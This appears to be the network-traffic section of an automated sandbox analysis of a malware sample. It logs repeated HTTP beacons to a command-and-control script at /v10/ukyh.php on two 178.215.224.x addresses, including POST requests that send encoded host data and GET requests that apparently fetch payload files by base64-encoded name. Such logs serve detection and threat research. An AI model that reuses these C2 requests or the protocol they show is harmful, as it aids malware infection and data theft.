jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTI3KDkyMipLOF5dc2dwcV5jbmZtZnteQ3ByRGF0YVxSbWlvaW5nXkZvbHJoaW5GdWVwcV40Q0M5NDQxMTdBQUM3MEQ8QEVGOERHOzIwR0ZHNjRfZG4mNXhbQl0xMDAqMTI4MzEqMTU6LjIzNS4yMDQmNzZZQF0zMjAoMzAwKEE6XFVxbXBzXGluZGducV5DcnJGYXZpVFBtYW9pbmdcRG9ueGppbkR3b3BzXjRDQTs2PjMzN0NDQTcyRDZCR0QyRkUzMDpHREU8NCx4bmVZQl8zMjAoOTgyMzEoMTc4LjIxNyYwMjQuNTZbQF8%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 111Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 111Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
Source: global trafficHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 111Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44 Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknownTCP traffic detected without corresponding DNS query: 178.215.224.74
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.252User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=5 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=31 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=7 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=10&melq=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?gi HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?gi HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.252User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=8 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: EaUMrTLEnhJoi.EaUMrTLEnhJoi
